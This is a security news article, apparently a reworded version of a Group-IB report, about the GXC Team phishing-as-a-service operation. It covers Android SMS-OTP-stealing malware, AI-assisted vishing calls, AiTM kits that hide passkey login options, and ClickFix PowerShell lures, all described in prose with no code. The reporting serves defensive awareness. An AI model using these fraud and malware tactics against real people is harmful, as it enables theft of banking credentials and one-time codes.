A New Cybercrime Service Utilizes AI to Package Deceptive Kits with Malicious Android Applications
An organized cybercrime unit called GXC Team that operates in the Spanish language has been identified blending deceptive kits with harmful Android apps, elevating the provision of malware as a service (MaaS) to a new tier.
Group-IB, a cybersecurity firm based in Singapore, which has been monitoring the criminal group since January 2023, characterized the cybercrime service as an “advanced AI-driven phishing-as-a-service system.” This system is capable of aiming at users of over 36 Hispanic banks, government establishments, and 30 organizations globally.
The phishing kit is valued between $150 and $900 monthly, while the package containing the phishing kit and Android malware is accessible through a subscription model for about $500 per month.
The victims of this operation include clients of Spanish financial establishments, as well as tax and government services, online marketplaces, banks, and cryptocurrency exchanges in the United States, the United Kingdom, Slovakia, and Brazil. At present, a total of 288 phishing domains associated with this activity have been discovered.
Additionally, the portfolio of available services encompasses the trade of pilfered banking credentials and personalized programming for hire schemes intended for other hacker groups targeting financial institutions, banks, and cryptocurrency enterprises.
“In contrast to conventional phishing developers, the GXC Team coupled phishing kits with an SMS OTP piracy malware, pioneering a new variation in a typical phishing attack narrative,” articulated security researchers Anton Ushakov and Martijn van den Berk in a report issued on Thursday.
Remarkably, the threat actors, rather than directly exploiting a fake page to seize user credentials, encourage the victims to download an Android-based banking application to thwart phishing scams. These pages are disseminated via smishing and other approaches.
Post-installation, the application requests permissions to set itself as the primary SMS app, thereby enabling the interception of one-time passwords and other messages and dispatching them to a Telegram bot commanded by the threat actors.
“In the subsequent phase, the application launches an authentic banking website in a WebView for users to interact with normally,” the researchers mentioned. “Following that, whenever the assailant triggers the OTP prompt, the Android malware surreptitiously receives and forwards SMS messages containing OTP codes to the Telegram chat managed by the threat actor.”
One of the services highlighted by the threat actor on a specialized Telegram channel is an AI-enriched tool for voice calls that allows customers to make voice calls to potential targets based on a string of cues directly from the phishing kit.
These calls typically appear to originate from a bank, directing the users to furnish their two-factor authentication (2FA) codes, install harmful applications, or perform other arbitrary actions.
“This uncomplicated yet practical technique advances the scheme, rendering it even more believable to the targets, and demonstrates the rapid and straightforward integration of AI tools by criminals in their stratagems, converting traditional fraud tactics to more modern, sophisticated ploys,” the researchers underlined.
In a recent disclosure, Mandiant, a Google-acquired company, disclosed that AI-driven voice duplication can imitate human speech with “incredible precision,” thereby enabling more realistic-sounding phishing (known as vishing) efforts that aid in initial penetration, escalation of privileges, and lateral movement.
“Criminals can mimic executives, colleagues, or even IT support staff to deceive victims into exposing confidential data, granting remote system access, or transferring funds,” remarked the threat intelligence organization.
“The inherent trust associated with a familiar voice can be exploited to manipulate victims into taking actions they would not normally take, such as clicking on malicious links, downloading malware, or divulging sensitive data.”
Phishing kits, coupled with adversary-in-the-middle (AiTM) capabilities, have become increasingly popular as they reduce the technical hurdles for executing large-scale phishing campaigns.
In a recent article, security analyst mr.d0x stated that malicious actors can leverage progressive web apps (PWAs) to devise convincing login screens for phishing purposes by modifying the user interface elements to exhibit a false URL bar.
In addition, such AiTM phishing kits can be employed to compromise accounts protected by passkeys on various internet platforms by utilizing an authentication approach redaction assault, exploiting the fact that these services continue to present a less secure authentication option as a fallback mechanism even when passkeys are configured.
“Given that the AitM has the ability to alter the view shown to the user by adjusting HTML, CSS and images or JavaScript in the login page, as it is transmitted to the end user, they can manage the authentication process and eliminate all mentions of passkey authentication,” cybersecurity firm eSentire stated.
The revelation arises in the midst of a recent increase in phishing campaigns incorporating URLs that have already been encrypted using security tools such as Secure Email Gateways (SEGs) in an effort to conceal phishing links and evade detection, as per reports from Barracuda Networks and Cofense.
Instances of social engineering attacks have also been detected employing unconventional strategies where users are lured to access apparently genuine websites and are then instructed to manually duplicate, insert, and run obscured code into a PowerShell terminal under the pretense of resolving issues related to viewing content in a web browser.
The specifics of how malware is distributed have been previously documented by ReliaQuest and Proofpoint. McAfee Labs is monitoring this activity under the name ClickFix.
“By inserting Base64-encoded scripts within seemingly authentic error prompts, attackers trick users into carrying out a sequence of actions that lead to the execution of malicious PowerShell commands,” researchers Yashvi Shah and Vignesh Dhatchanamoorthy explained.
“These commands commonly download and run payloads, such as HTA files, from remote servers, subsequently deploying malware like DarkGate and Lumma Stealer.”
About Author
